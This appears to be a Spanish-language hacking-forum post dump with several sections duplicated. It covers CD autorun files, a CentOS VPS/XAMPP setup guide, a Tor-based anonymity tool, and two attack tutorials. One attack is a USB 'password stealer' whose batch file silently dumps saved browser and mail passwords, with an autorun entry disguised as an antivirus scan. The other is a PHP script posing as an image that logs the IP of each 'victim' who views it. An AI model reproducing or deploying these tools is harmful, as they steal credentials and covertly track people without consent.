Por ejemplo, si quieres hacer un autorun para un CD, y que el Autorun te inicie una página web llamada "index.html", con un icono para el CD, llamado "icoCD.ico". Tendrás que hacer lo siguiente:
[autorun]
OPEN=\windows\explorer.exe index.html
ICON=icoCD.ico
Puede que lo que quieras que se ejecute sea un archivo de una determinada aplicación, como por ejemplo un archivo html (o cualquier otro archivo que quieras), entonces tendrás que crear además un archivo BAT (por lotes) que haga que el archivo de la aplicación se pueda auto ejecutar. Los pasos serán primero crear el archivo bat con el bloc de notas, que por ejemplo lo llamamos auto.bat y estará constituido por las dos líneas siguientes:
@explorer Indice.htm
@exit
Donde "Indice.htm" es el nombre del archivo que tengas (si es un archivo del Word sería por ejemplo :@explorer chistes.doc, se admite cualquier archivo de windows y siempre que el ordenador donde se use el CD tenga el programa que abre dicho archivo).
Luego debes crear el archivo autorun.inf:
[autorun]
open=auto.bat
icon=Dibujo.ico
Ambos archivos irán en el directorio raíz, así como el archivo htm.
Consejo: antes de grabar el CD pon el archivo "auto" y el archivo que quieras que se abra dentro de la misma carpeta de tu disco duro y ejecuta el archivo .bat para comprobar que abre la aplicación con el archivo elegido, si es así cuando grabes el CD y pongas los 3 archivos anteriores en el directorio raíz no fallará, si no se abre comprueba si tu archivo por lotes .bat realmente tiene extensión .bat y no es "auto.bat.txt" y su contenido es correcto.
AÑADIR OPCIONES AL MENÚ CONTEXTUAL
Otra cosa que se puede hacer desde el fichero AUTORUN.INF es añadir opciones al menú de contexto del CD-ROM (el que sale al pulsar con el botón secundario sobre el icono del CD). Puede resultar interesante dar la opción de "Explorar el contenido del CD" o "Iniciar la instalación de... (un programa cualquiera)". Esto también es fácil:
[AUTORUN]
OPEN=SHELEXEC.EXE <fichero>
ICON=<icono>
SHELL\EXPLORAR=Explorar el contenido del CD-ROM
SHELL\EXPLORAR\COMMAND=EXPLORER.EXE /E,\
SHELL\HTML=Ver índice HTML del CD-ROM
SHELL\HTML\COMMAND=SHELEXEC.EXE INDICE.HTM
El truco consiste en crear parejas de líneas "SHELL\<clave>" y "SHELL\<clave>\COMMAND" poniendo en la primera el texto que queremos que aparezca en el menú de contexto, y en la segunda la instrucción que queremos que se ejecute al seleccionar la opción.
#189
Redes y antenas / [Tutorial] Configurando y poniendo a punto un VPS
Agosto 16, 2011, 12:06:05 PM
Bueno, hace un par de días, por fin, conseguimos el dinero que necesitábamos para contratar un VPS por 6 meses. Pensando en implementarlo en No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta. personalmente, pensé que se trataba de algo muy sencillo, y es el momento, no había trabajado con mas que con servidores compartidos.

Cual fue mi sospresa cuando descubri que mi VPS no incluia ningun panel de control.
Mucho mas frustrante fue el hecho de no encontrar documentacion apropiada y en español para configurar mi servidor. Asi pues. Me decidi a escribir un articulo, quizas algo extenso pero que incluya mi experiencia personal. Quizas pueda ser de utilidad a alguien en mi situacion.
Contratando un VPS
Es importante considerar, a la hora de contratar un servidor privado cuales son nuestras necesidades especificas. Visitar diferentes proveedores de hosting y ponerse en contacto con ellos para plantear preguntas especificas sobre el script que planeamos instalar, y el uso que pensamos darle al servidor. Para No tienes permitido ver enlaces. Registrate o Entra a tu cuenta el servidor que mas se adecuo a nuestras necesidades fue No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, contratar un VPS requiere un proceso mas extenso de verificacion, cabe señalar que un VPS es bastante mas costoso que un servidor compartido comun y corriente. es por eso, que considere, que el Level 2. se adecuaba a mis necesidades.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, Si quisieras obviar este tutorial. Podrias contratar un VPS configurado con Cpanel, pero claro que su costo es mayor.
El Panel de Control
Una vez que hayas concluido con la contratacion del servicio, tu proveedor de hosting te brindara algunos detalles importantes, en mi caso, al contratar un VPS con el panel VZ he recibido los siguientes detalles:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Entre los detalles suministrados, podemos observar el Power Panel (VZ), Vamos a apuntar nuestro navegador para acceder al Panel de control. Una vez nos hayamos logeado, veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Probablemente, las secciones que mas utilizaremos durante este tutorial, seran la Administracion de Archivos y la conexion SSH. Ahora, cabe mencionar, que dicho panel de control, sirve de escritorio virtual a nuestro VPS.
En general, tenemos acceso root al sistema, es decir al propio sistema operativo de nuestro servidor. Cabe mencionar que en mi caso, mi sistema operativo es CentOS.
Ahora, si bien tener acceso root es algo exelente, pues no tenemos limitantes en cuanto al software que deseemos instalar. Implica que todas las pre-configuraciones a las que estamos acostumbrados en los hosting compartidos no existen. Porque NOSOTROS seremos en esta ocasion los sysadmin. Es decir, quienes debemos configurar el sistema.
Instalando Apache, PHP, MySQL, Filezilla y phpMyAdmin
Es probablemente la parte mas complicada del tutorial, al menos fue la parte que me resulto mas problemática. Trabajando en un SO desconocido, tanto en su sitnaxis como en su estructura. La verdad resulto un proceso un poco mas complejo de lo esperado. Sin embargo, Aqui lo resumo y les evito googlear lo que yo google para encontrar algunas respuestas.
Es probable que su servidor, venga preconfigurado con apache instalado. En Hostgator, es asi, sin embargo, php y mysql no estaban instalados, por lo que hubo que hacerlo manual. Ahora. Personalmente, decidi utilizar xampp, por haberlo usado antes en Ubuntu. Ademas de ser mi SO algo antiguo y sus repositorios estar obsoletos. (teniendo en cuenta que no se absolutamente nada de CentOS tampoco pude actualizar la lista)
Bien, manos a la obra; vamos a ir a nuestro panel de control, en la pestaña Conexion SSH.. y nos logearemos con los datos que nos ha suministrado nuestro proveedor de servicio.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Es solo la terminal de nuestra distribucion, y todas las operaciones deberemos realizarlas a travez de esta pantallita, para quienes no estamos acostumbrados a trabajar en "modo-texto" puede ser algo incomodo, pero resulta que la adaptacion es mucho mas rapida.
Vamos a obtener xampp desde nuestro servidor, para eso nos dirigiremos a la carpeta /opt escribiendo en la terminal
cd /opt
Una vez hecho esto, vamos a a escribir
wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Veremos el proceso de descarga desde nuestra terminal, se descargara un paquete que pesa unos 60mb, sin embargo con la velocidad de descarga de nuestro servidor 5 o 7 mbs/s no tardara mas de unos segundos en completarse la operacion.
Ahora, vamos a descomprimir el archivo, para eso vamos a escribir en nuestra terminal.
tar xzf xampp-linux-1.5.4a.tar.gz
Si todo ha salido bien, podremos ver desde nuestro gestor de archivos en el VZ power panel, algo asi:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Eso significa que hemos instalado correctamente xampp, pero ahora, debemos detener nuestro servidor apache, si es que esta corriendo para poder iniciarlo desde lampp, para eso vamos a escribir en la terminal
/etc/init.d/httpd stop
Nos deberia de aparecer un mensaje diciendo que se ha detenido el servicio con exito, ahora vamos a iniciar lampp
/opt/lampp/lampp start
Si todos los servicios se han iniciado correctamente, enhorabuena! hemos logrado instalar apache, php, mysql, phpmyadmin, y filezilla.
Pero claro, Seria muy facil si todo hubiera funcionado tal y como se esperaba que funcionara. Sin embargo, es muy posible que hayan surgido ciertos problemas.
Posibles Problemas
XAMPP: Another MySQL daemon is already running
Significa que hay un servicio MySQL ejecutandose y debe detenerse, esto se puede hacer facilmente escribiendo
/etc/init.d/mysqld stop
Eventualmente veriamos un mensaje que indique, el servicio se ha detenido, pero tambien existe la posibilidad de que el servicio no se pueda detener y nos aparezca un tragico [FAIL]
Para solucionar este problema, vamos, en primer lugar a reinstalar mysql, para despues poder detenerlo. Asi pues, vamos hacer lo siguiente:
1.
yum -y remove mysql mysql-server
2.
yum install mysql mysql-server
3.
/etc/init.d/mysqld stop
4.
yum -y remove mysql mysql-server
5.
rm -rf /var/lib/mysql
6.
chmod 1777 /tmp
7.
yum -y install mysql mysql-server
8.
/etc/init.d/mysqld restart
9.
/etc/init.d/mysqld stop
Si se pudo detener con exito el servicio, entonces ahora si podran iniciar lampp escribiendosi el servicio lo habian logrado iniciar
/opt/lampp/lampp restart
Y si lo habian detenenido, bastara con escribir
/opt/lampp/lampp start
Una vez hemos logrado que el sitio se inicie correctamente, podriamos visualizarlo desde la IP que nuestro proveedor de hosting nos asigno, sin embargo, es posible que nos encontremos con un mensaje indicandonos que nuestro sitio solo es accesible desde una red local.
Configurando XAMPP
Esto es por un nuevo moldulo que ha implementado Xampp, para poder desbloquearlo, vamos a dirigirnos desde nuestro gestor de archivos en el panel de control a /opt/lampp/etc/extra/httpd-xampp.conf
Veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y lo que haremos sera comentar la linea que dice:
Deny from all
La dejaremos asi:
# Deny from all
Una vez realizado este cambio, podremos acceder a nuestro sitio a travez de nuestra IP, y veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Sin embargo, coincidiran conmigo en que esto es sumamente inseguro, por eso, vamos a asignar contraseña al directorio http://suip/xampp y a todos los servicios derivados de este paquete, para eso vamos a ejecutar en nuestra terminal
Un asistente nos ayudara con el proceso de asegurar nuestra instalacion de xampp
XAMPP: Quick security check...
XAMPP: Your XAMPP pages are NOT secured by a password.
XAMPP: Do you want to set a password? [yes] yes (1)
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Password protection active. Please use 'lampp' as user name!
XAMPP: MySQL is accessable via network.
XAMPP: Normaly that's not recommended. Do you want me to turn it off? [yes] yes
XAMPP: Turned off.
XAMPP: Stopping MySQL...
XAMPP: Starting MySQL...
XAMPP: The MySQL/phpMyAdmin user pma has no password set!!!
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Setting new MySQL pma password.
XAMPP: Setting phpMyAdmin's pma password to the new one.
XAMPP: MySQL has no root passwort set!!!
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Write the passworde somewhere down to make sure you won't forget it!!!
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Setting new MySQL root password.
XAMPP: Setting phpMyAdmin's root password to the new one.
XAMPP: The FTP password for user 'nobody' is still set to 'lampp'.
XAMPP: Do you want to change the password? [yes] yes
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Reload ProFTPD...
XAMPP: Done.
Recuerden anotar todos estos passwords conforme los vallan colocando.
Ahora, podemos acceder a nuestro servidor utilizando un cliente FTP, por ejemplo Filezilla o bien CuteFTP, escribiendo en "host" o "server" la IP de nuestro sitio, en user, escribimos "nobody" y en "password" el password que le asignamos al user nobody durante la configuracion de seguridad de xampp.
Instalando un panel de control
Un panel de control es sumamente util para gestionar algunos recursos del servidor que de otra manera pueden ser algo tediosos, por eso, vamos a instalar el panel de control webmin. Hasta aqui llegara el tutorial, ya el resto es mas sencillo y la verdad este tutorial se alargo un poco.
Si queremos utilizar webmin tenemos que instalar perl (un lenguaje de programacion usado por webmin) openssl (para acceder a las paginas de webmin de modo seguro) y perl-Net-SSLeay, una extension en perl para el uso de openssl. Instalamos los programas necesarios con el comando (distribucion centos):
Creamos una carpeta donde vamos a instalar webmin
Nos posicionamos en la carpeta /usr/src y escribimos el siguiente comando:
Descargamos el Webmin
Decomprimimos el programa:
entramos en la carpeta creada desde la consola:
E iniciamos la instalacion
damos Enter
aparecera: Log file directory [/var/webmin]
damos Enter
aparecera: Full path to perl (default /usr/bin/perl):
damos Enter
aparecera: Web server port: (default 10000):
escribimos 25000 y damos Enter
Escogemos un nombre de usuario de administrador, una contrasena, la repetimos, elegimos usar SSL (opcional) y le decimos que queremos que webmin arranque al boot de nuestro servidor linux.
Una vez terminada la instalacion podremos empezar a usar nuestro sistema de administracion abriendo Firefox (o otro navegador) y apuntando a:
www.example.com:25000
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, para poder agregar su dominio desde el panel de control, esta en dependencia de sus dns y su configuracion personal, sin embargo, puede serles util esta información: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Espero este tutorial les haya sevido, y se eviten tantos problemas a la hora de configurar su VPS, como siempre a la espera de sus comentarios
Un Saludo
MzStudios
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Cual fue mi sospresa cuando descubri que mi VPS no incluia ningun panel de control.
Mucho mas frustrante fue el hecho de no encontrar documentacion apropiada y en español para configurar mi servidor. Asi pues. Me decidi a escribir un articulo, quizas algo extenso pero que incluya mi experiencia personal. Quizas pueda ser de utilidad a alguien en mi situacion.
Contratando un VPS
Es importante considerar, a la hora de contratar un servidor privado cuales son nuestras necesidades especificas. Visitar diferentes proveedores de hosting y ponerse en contacto con ellos para plantear preguntas especificas sobre el script que planeamos instalar, y el uso que pensamos darle al servidor. Para No tienes permitido ver enlaces. Registrate o Entra a tu cuenta el servidor que mas se adecuo a nuestras necesidades fue No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, contratar un VPS requiere un proceso mas extenso de verificacion, cabe señalar que un VPS es bastante mas costoso que un servidor compartido comun y corriente. es por eso, que considere, que el Level 2. se adecuaba a mis necesidades.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, Si quisieras obviar este tutorial. Podrias contratar un VPS configurado con Cpanel, pero claro que su costo es mayor.
El Panel de Control
Una vez que hayas concluido con la contratacion del servicio, tu proveedor de hosting te brindara algunos detalles importantes, en mi caso, al contratar un VPS con el panel VZ he recibido los siguientes detalles:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Entre los detalles suministrados, podemos observar el Power Panel (VZ), Vamos a apuntar nuestro navegador para acceder al Panel de control. Una vez nos hayamos logeado, veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Probablemente, las secciones que mas utilizaremos durante este tutorial, seran la Administracion de Archivos y la conexion SSH. Ahora, cabe mencionar, que dicho panel de control, sirve de escritorio virtual a nuestro VPS.
En general, tenemos acceso root al sistema, es decir al propio sistema operativo de nuestro servidor. Cabe mencionar que en mi caso, mi sistema operativo es CentOS.
Ahora, si bien tener acceso root es algo exelente, pues no tenemos limitantes en cuanto al software que deseemos instalar. Implica que todas las pre-configuraciones a las que estamos acostumbrados en los hosting compartidos no existen. Porque NOSOTROS seremos en esta ocasion los sysadmin. Es decir, quienes debemos configurar el sistema.
Instalando Apache, PHP, MySQL, Filezilla y phpMyAdmin
Es probablemente la parte mas complicada del tutorial, al menos fue la parte que me resulto mas problemática. Trabajando en un SO desconocido, tanto en su sitnaxis como en su estructura. La verdad resulto un proceso un poco mas complejo de lo esperado. Sin embargo, Aqui lo resumo y les evito googlear lo que yo google para encontrar algunas respuestas.
Es probable que su servidor, venga preconfigurado con apache instalado. En Hostgator, es asi, sin embargo, php y mysql no estaban instalados, por lo que hubo que hacerlo manual. Ahora. Personalmente, decidi utilizar xampp, por haberlo usado antes en Ubuntu. Ademas de ser mi SO algo antiguo y sus repositorios estar obsoletos. (teniendo en cuenta que no se absolutamente nada de CentOS tampoco pude actualizar la lista)
Bien, manos a la obra; vamos a ir a nuestro panel de control, en la pestaña Conexion SSH.. y nos logearemos con los datos que nos ha suministrado nuestro proveedor de servicio.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Es solo la terminal de nuestra distribucion, y todas las operaciones deberemos realizarlas a travez de esta pantallita, para quienes no estamos acostumbrados a trabajar en "modo-texto" puede ser algo incomodo, pero resulta que la adaptacion es mucho mas rapida.
Vamos a obtener xampp desde nuestro servidor, para eso nos dirigiremos a la carpeta /opt escribiendo en la terminal
cd /opt
Una vez hecho esto, vamos a a escribir
wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Veremos el proceso de descarga desde nuestra terminal, se descargara un paquete que pesa unos 60mb, sin embargo con la velocidad de descarga de nuestro servidor 5 o 7 mbs/s no tardara mas de unos segundos en completarse la operacion.
Ahora, vamos a descomprimir el archivo, para eso vamos a escribir en nuestra terminal.
tar xzf xampp-linux-1.5.4a.tar.gz
Si todo ha salido bien, podremos ver desde nuestro gestor de archivos en el VZ power panel, algo asi:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Eso significa que hemos instalado correctamente xampp, pero ahora, debemos detener nuestro servidor apache, si es que esta corriendo para poder iniciarlo desde lampp, para eso vamos a escribir en la terminal
/etc/init.d/httpd stop
Nos deberia de aparecer un mensaje diciendo que se ha detenido el servicio con exito, ahora vamos a iniciar lampp
/opt/lampp/lampp start
Si todos los servicios se han iniciado correctamente, enhorabuena! hemos logrado instalar apache, php, mysql, phpmyadmin, y filezilla.
Pero claro, Seria muy facil si todo hubiera funcionado tal y como se esperaba que funcionara. Sin embargo, es muy posible que hayan surgido ciertos problemas.
Posibles Problemas
XAMPP: Another MySQL daemon is already running
Significa que hay un servicio MySQL ejecutandose y debe detenerse, esto se puede hacer facilmente escribiendo
/etc/init.d/mysqld stop
Eventualmente veriamos un mensaje que indique, el servicio se ha detenido, pero tambien existe la posibilidad de que el servicio no se pueda detener y nos aparezca un tragico [FAIL]
Para solucionar este problema, vamos, en primer lugar a reinstalar mysql, para despues poder detenerlo. Asi pues, vamos hacer lo siguiente:
1.
yum -y remove mysql mysql-server
2.
yum install mysql mysql-server
3.
/etc/init.d/mysqld stop
4.
yum -y remove mysql mysql-server
5.
rm -rf /var/lib/mysql
6.
chmod 1777 /tmp
7.
yum -y install mysql mysql-server
8.
/etc/init.d/mysqld restart
9.
/etc/init.d/mysqld stop
Si se pudo detener con exito el servicio, entonces ahora si podran iniciar lampp escribiendosi el servicio lo habian logrado iniciar
/opt/lampp/lampp restart
Y si lo habian detenenido, bastara con escribir
/opt/lampp/lampp start
Una vez hemos logrado que el sitio se inicie correctamente, podriamos visualizarlo desde la IP que nuestro proveedor de hosting nos asigno, sin embargo, es posible que nos encontremos con un mensaje indicandonos que nuestro sitio solo es accesible desde una red local.
Configurando XAMPP
Esto es por un nuevo moldulo que ha implementado Xampp, para poder desbloquearlo, vamos a dirigirnos desde nuestro gestor de archivos en el panel de control a /opt/lampp/etc/extra/httpd-xampp.conf
Veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y lo que haremos sera comentar la linea que dice:
Deny from all
La dejaremos asi:
# Deny from all
Una vez realizado este cambio, podremos acceder a nuestro sitio a travez de nuestra IP, y veremos algo como esto:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Sin embargo, coincidiran conmigo en que esto es sumamente inseguro, por eso, vamos a asignar contraseña al directorio http://suip/xampp y a todos los servicios derivados de este paquete, para eso vamos a ejecutar en nuestra terminal
Citar
opt/lampp/lampp security
Un asistente nos ayudara con el proceso de asegurar nuestra instalacion de xampp
XAMPP: Quick security check...
XAMPP: Your XAMPP pages are NOT secured by a password.
XAMPP: Do you want to set a password? [yes] yes (1)
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Password protection active. Please use 'lampp' as user name!
XAMPP: MySQL is accessable via network.
XAMPP: Normaly that's not recommended. Do you want me to turn it off? [yes] yes
XAMPP: Turned off.
XAMPP: Stopping MySQL...
XAMPP: Starting MySQL...
XAMPP: The MySQL/phpMyAdmin user pma has no password set!!!
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Setting new MySQL pma password.
XAMPP: Setting phpMyAdmin's pma password to the new one.
XAMPP: MySQL has no root passwort set!!!
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Write the passworde somewhere down to make sure you won't forget it!!!
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Setting new MySQL root password.
XAMPP: Setting phpMyAdmin's root password to the new one.
XAMPP: The FTP password for user 'nobody' is still set to 'lampp'.
XAMPP: Do you want to change the password? [yes] yes
XAMPP: Password: ******
XAMPP: Password (again): ******
XAMPP: Reload ProFTPD...
XAMPP: Done.
Recuerden anotar todos estos passwords conforme los vallan colocando.
Ahora, podemos acceder a nuestro servidor utilizando un cliente FTP, por ejemplo Filezilla o bien CuteFTP, escribiendo en "host" o "server" la IP de nuestro sitio, en user, escribimos "nobody" y en "password" el password que le asignamos al user nobody durante la configuracion de seguridad de xampp.
Instalando un panel de control
Un panel de control es sumamente util para gestionar algunos recursos del servidor que de otra manera pueden ser algo tediosos, por eso, vamos a instalar el panel de control webmin. Hasta aqui llegara el tutorial, ya el resto es mas sencillo y la verdad este tutorial se alargo un poco.
Si queremos utilizar webmin tenemos que instalar perl (un lenguaje de programacion usado por webmin) openssl (para acceder a las paginas de webmin de modo seguro) y perl-Net-SSLeay, una extension en perl para el uso de openssl. Instalamos los programas necesarios con el comando (distribucion centos):
Citar
yum install perl openssl openssl-devel perl-Net-SSLeay
Creamos una carpeta donde vamos a instalar webmin
Citar
mkdir /opt/lampp/htdocs/webmin
Nos posicionamos en la carpeta /usr/src y escribimos el siguiente comando:
Citar
cd /usr/src
Descargamos el Webmin
Citar
wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Decomprimimos el programa:
Citar
tar -xf webmin-1.500.tar.gz
entramos en la carpeta creada desde la consola:
Citar
cd webmin-1.510
E iniciamos la instalacion
Citar
./setup.sh /usr/local/webmin
damos Enter
aparecera: Log file directory [/var/webmin]
damos Enter
aparecera: Full path to perl (default /usr/bin/perl):
damos Enter
aparecera: Web server port: (default 10000):
escribimos 25000 y damos Enter
Escogemos un nombre de usuario de administrador, una contrasena, la repetimos, elegimos usar SSL (opcional) y le decimos que queremos que webmin arranque al boot de nuestro servidor linux.
Una vez terminada la instalacion podremos empezar a usar nuestro sistema de administracion abriendo Firefox (o otro navegador) y apuntando a:
www.example.com:25000
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ahora, para poder agregar su dominio desde el panel de control, esta en dependencia de sus dns y su configuracion personal, sin embargo, puede serles util esta información: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Espero este tutorial les haya sevido, y se eviten tantos problemas a la hora de configurar su VPS, como siempre a la espera de sus comentarios
Un Saludo
MzStudios
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#190
Hacking / Tutorial - Crear USB Roba Datos
Agosto 12, 2011, 03:06:53 PM
Este es un nuevo método para crear un USB Roba Datos el cual será un pequeño Stealer que se ejecutará por autorun. Aviso de que si está desactivado no funcionará.
Utilizaremos los siguientes programas (cada uno utilizará una función distinta):
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Vamos a descomprimir los archivos y a colocar el ejecutable en la raíz del dispositivo de almacenamiento USB.
Ahora creamos un código en Batch para que ejecute los programas:
Código: text
Ahora crearemos el autorun que se tendrá que guardar como "autorun.inf"
Código: text
Listo, nuestro USB ahora cada vez que lo introduzcamos en un PC nos guardará en archivos de texto las passwords almacenadas.
Autor: The_Maxu
Redactado: Stiuvert
Saludos
Utilizaremos los siguientes programas (cada uno utilizará una función distinta):
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Vamos a descomprimir los archivos y a colocar el ejecutable en la raíz del dispositivo de almacenamiento USB.
Ahora creamos un código en Batch para que ejecute los programas:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Ahora crearemos el autorun que se tendrá que guardar como "autorun.inf"
[autorun]
open=launch.bat
ACTION= Realizar Escaner Antivirus
Listo, nuestro USB ahora cada vez que lo introduzcamos en un PC nos guardará en archivos de texto las passwords almacenadas.
Autor: The_Maxu
Redactado: Stiuvert
Saludos
#191
Hacking / Navegar anónimo con AdvOR sin ser detectado usando proxy
Agosto 12, 2011, 11:43:23 AM
Advanced Onion Router permite el uso de habilitar conexiones seguras y anónimas con cualquier aplicación que se conecta a Internet. Con frecuencia atraviesan cortafuegos y la censura sitio web. A diferencia de los clientes similares que requieren un proxy configurable, AOR es capaz de “forzar” un programa para utilizar la red Tor.
¿Pero como usarlo?
Primero vamos ejecutar el programa así que lo descomprimimos el rar en el escritorio
Ejecutamos el AdvOR
Una vez abierto vamos a donde dice connect y expramos a que se llene la barra

Damos a la flecha a la par de New Identify

Elegimos el país que queramos y ya esta

Ahora voy a explicar cómo configurarlo para que funcione en el navegador firefox,opera o chrome
En firefox hacemos lo siguiente
1. Damos al botón firefox
2. vamos a opciones y opciones
3.en la ventana buscamos “Avanzado” y pestaña “Red”
4. vemos que dice “configurar modo en que firefox se conecta a Internet” damos en “configuración”
5.ponemos el que dice configuración manual de proxy
10.Ponemos esto “Proxy HTTP: 127.0.0.1 Puerto:9050 ”
11. por ultimo ponemos la opción “Usar el mismo proxy para todos” y damos acepta
para desactivarlo damos en “sin proxy”
en chrome hacemos lo siguiente:
tenemos que instalar este complementoNo tienes permitido ver enlaces. Registrate o Entra a tu cuentaNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez instalado tenemos que configurarlo
Damos click derecho a la imagen y damos en opciones
después en proxy profiles ponemos esto:
profile name: el que quieran
Manual Configuración ponemos esto: 127.0.0.1 Port: 9050
Queda así

para navegar anónimo tiene que estar el programa AdvOR obviamente y dar click al paneta ,seleccionar el nombre que pusimos al proxy así:

Una vez que cargo la página con el proxy este se desactiva automáticamente así que si quieren navegar anónimo en otra página de ven hacer lo mismo.
Y por último en opera asemos lo siguiente:
1. Damos al botón opera
2. vamos a configuración y opciones
3. vacamos la pestaña “Avanzado” y “Redes”
4. damos donde dice servidores proxy
5. donde dice HTTP ponemos 127.0.0.1 pueto: 9050
10. y damos en usar proxy para todos los protocolos aceptar y listo
11. para desactivarlo quitamos el check del HTTP
Una de las mejores característica de AdvOR es que puedes navegar sin que te detecten que estas usando un proxy:

además si queremos forzar a un programa para que funcione con AdvOR lo podemos hacer seleccionando el icono y arrastrándolo al programa que queremos forzar (no es recomendable usarlo en los navegadores)

¿Pero como usarlo?
Primero vamos ejecutar el programa así que lo descomprimimos el rar en el escritorio
Ejecutamos el AdvOR
Una vez abierto vamos a donde dice connect y expramos a que se llene la barra

Damos a la flecha a la par de New Identify

Elegimos el país que queramos y ya esta

Ahora voy a explicar cómo configurarlo para que funcione en el navegador firefox,opera o chrome
En firefox hacemos lo siguiente
1. Damos al botón firefox
2. vamos a opciones y opciones
3.en la ventana buscamos “Avanzado” y pestaña “Red”
4. vemos que dice “configurar modo en que firefox se conecta a Internet” damos en “configuración”
5.ponemos el que dice configuración manual de proxy
10.Ponemos esto “Proxy HTTP: 127.0.0.1 Puerto:9050 ”
11. por ultimo ponemos la opción “Usar el mismo proxy para todos” y damos acepta
para desactivarlo damos en “sin proxy”
en chrome hacemos lo siguiente:
tenemos que instalar este complementoNo tienes permitido ver enlaces. Registrate o Entra a tu cuentaNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Una vez instalado tenemos que configurarlo
Damos click derecho a la imagen y damos en opciones
después en proxy profiles ponemos esto:
profile name: el que quieran
Manual Configuración ponemos esto: 127.0.0.1 Port: 9050
Queda así

para navegar anónimo tiene que estar el programa AdvOR obviamente y dar click al paneta ,seleccionar el nombre que pusimos al proxy así:

Una vez que cargo la página con el proxy este se desactiva automáticamente así que si quieren navegar anónimo en otra página de ven hacer lo mismo.
Y por último en opera asemos lo siguiente:
1. Damos al botón opera
2. vamos a configuración y opciones
3. vacamos la pestaña “Avanzado” y “Redes”
4. damos donde dice servidores proxy
5. donde dice HTTP ponemos 127.0.0.1 pueto: 9050
10. y damos en usar proxy para todos los protocolos aceptar y listo
11. para desactivarlo quitamos el check del HTTP
Una de las mejores característica de AdvOR es que puedes navegar sin que te detecten que estas usando un proxy:

además si queremos forzar a un programa para que funcione con AdvOR lo podemos hacer seleccionando el icono y arrastrándolo al programa que queremos forzar (no es recomendable usarlo en los navegadores)

#192
Back-end / Sacar IP mediante Web o Imágen en Php
Julio 31, 2011, 03:58:53 PM<?php
Header("Content-type: image/png");
$im = ImageCreate(300, 300);
$red = ImageColorAllocate($im, 255, 0, 0);
$white = ImageColorAllocate($im, 255, 255, 255);
$blue = ImageColorAllocate($im, 0, 0, 255);
$black = ImageColorAllocate($im, 0, 0, 0);
ImageFill($im, 0, 0, $red);
ImageString($im, 10, 10, 10, "Hola DragonJar", $black);
$font_width = ImageFontWidth(10);
$string_width = $font_width * (strlen("Hola! DragonJAR!"));
ImageLine($im, 100, 50, (100+$string_width), 50, $black);
ImagePng($im);
$nombre_archivo = 'log.html';
if($_SERVER["HTTP_X_FORWARDED_FOR"]){
$contenido = $_SERVER["HTTP_X_FORWARDED_FOR"]."<br/>";
}else{
$contenido = $_SERVER["REMOTE_ADDR"]."<br/>";
}
if (is_writable($nombre_archivo)) {
if (!$gestor = fopen($nombre_archivo, 'a')) {
echo "Error";
exit;
}
if (fwrite($gestor, $contenido) === FALSE) {
echo "Error";
exit;
}
echo "Exito";
fclose($gestor);
} else {
echo "Error";
}
?>
Suben por FTP el Index.php y crean un HTML con el nombre de "log.html" y también lo suben.
Envían la página a la victima o bien si están en un Foro en tu Perfil eliges la opción "Subir por Link tu imagen y añades esto: url-de-tu-ágina/index.php
Los Logs los verás en: url-de-tu-página/log.html
Saludos
#193
Redes y antenas / Cómo cambiar los DNS
